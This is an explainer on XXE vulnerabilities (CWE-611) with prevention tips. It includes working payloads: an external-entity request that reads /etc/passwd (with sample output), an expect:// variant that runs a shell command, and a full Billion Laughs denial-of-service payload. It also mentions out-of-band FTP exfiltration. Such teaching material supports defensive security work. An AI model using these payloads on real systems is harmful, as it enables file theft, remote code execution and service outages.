XML External Entities (XXE) (CWE-611)

Description

XML (Extensible Markup Language) is a markup language that encodes data in a machine-readable and human-readable format.

XML 1.0 Standard defines structure as below,

<?xml version="1.0"?>
<!DOCTYPE greeting SYSTEM "hello.dtd">
<greeting>Hello, world!</greeting> 

XML is commonly used for communication between client and server. XML is also used for sharing resources between two different web applications.

e.g., If we send this XML in the request body

<?xml version="1.0"?>
<getPrice>
    <productId>2</productId>
</getPrice> 

Web application is giving, Price of product having ID=2 as

1999

Then attacker can edit request as,

<?xml version="1.0"?>
<getPrice>
    <productId>-1</productId>
</getPrice> 

Web application will not find any product with negative Product Id and it will return error in response as,

No product found with id -1

Then attacker can add DTD (Document type declaration) Entity as,

<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY secret SYSTEM "file:///etc/passwd" >]>
<getPrice>
    <productId>&secret;</productId>
</getPrice> 

Web application will read file:///etc/passwd and store it in entity secret. So, response will be,

No product found with id 
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys: 
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp: 
guest:!:100:100::/home/guest:

Thus, the Attacker can get any file from the server. For faster operation, the Attacker can set a temporary FTP server there and retrieve all files using FTP.

• If php 'expect' module is eabled, Attacker will get RCE as,

  <?xml version="1.0"?>
  <!DOCTYPE data [<!ENTITY secret SYSTEM "expect://ls" >]>
  <getPrice>
      <productId>&secret;</productId>
  </getPrice> 
  

• An attacker can do Billion laughs attack (Type of DoS Attack) using XXE.

    ```
    <?xml version="1.0"?>
    <!DOCTYPE lolz [
     <!ENTITY lol "lol">
     <!ELEMENT lolz (#PCDATA)>
     <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
     <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
    ```
  

  this 1KB payload will generable XML containning 10⁹ = a billion "lol"s, which will take about 3GB memory, resulting into DoS (Denial of Services).

Impact

• Server File retrieval is possible (including sensitive files like /etc/passwd).
• May lead to SSRF(Server Side Request Forgery)
• Small temporary DoS(Denial of Service)

Prevention

• Always Sanitize user input.
• Disable external entity processing and DTD Processing in XML Parser.
• Update XML Processing libraries from time to time.

Tools

• 230-OOB: An Out-of-Band XXE server for retrieving file contents over FTP.